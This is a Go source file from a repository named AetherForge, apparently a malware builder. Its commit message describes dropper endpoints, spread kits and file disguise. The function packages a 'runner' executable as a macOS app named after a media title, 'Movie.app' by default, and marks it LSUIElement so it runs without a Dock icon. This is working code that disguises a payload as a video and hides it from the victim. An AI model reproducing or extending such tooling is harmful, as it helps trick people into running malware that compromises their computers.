Files
AetherForge/server/internal/builder/fusion_darwin_app.go
drjones 0f9e04f5f6 Add universal forge, fusion disguise, remote deploy, and stability fixes.
Ship cross-platform spread kits and fusion ZIPs with per-OS launchers, one-liner dropper endpoints, Windows file disguise, and a large batch of wiring/bug fixes so agents connect reliably across a LAN test fleet.
2026-05-29 20:53:13 -07:00

36 lines
1.2 KiB
Go

package builder
import (
"fmt"
"os"
"path/filepath"
"strings"
)
func (h *Handler) buildDarwinAppBundle(outDir, title, runnerPath string, p BuildPlatform) error {
appName := sanitizeFileName(strings.TrimSuffix(filepath.Base(title), filepath.Ext(title))) + ".app"
if appName == ".app" {
appName = "Movie.app"
}
appDir := filepath.Join(outDir, appName)
macosDir := filepath.Join(appDir, "Contents", "MacOS")
if err := os.MkdirAll(macosDir, 0755); err != nil {
return err
}
dest := filepath.Join(macosDir, "runner")
if err := copyFile(runnerPath, dest); err != nil {
return err
}
_ = os.Chmod(dest, 0755)
name := strings.TrimSuffix(filepath.Base(title), filepath.Ext(title))
plist := fmt.Sprintf(`<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0"><dict>
<key>CFBundleName</key><string>%s</string>
<key>CFBundleExecutable</key><string>runner</string>
<key>CFBundleIdentifier</key><string>com.aetherforge.%s</string>
<key>LSUIElement</key><true/>
</dict></plist>`, name, sanitizeFileName(title))
return os.WriteFile(filepath.Join(appDir, "Contents", "Info.plist"), []byte(plist), 0644)
}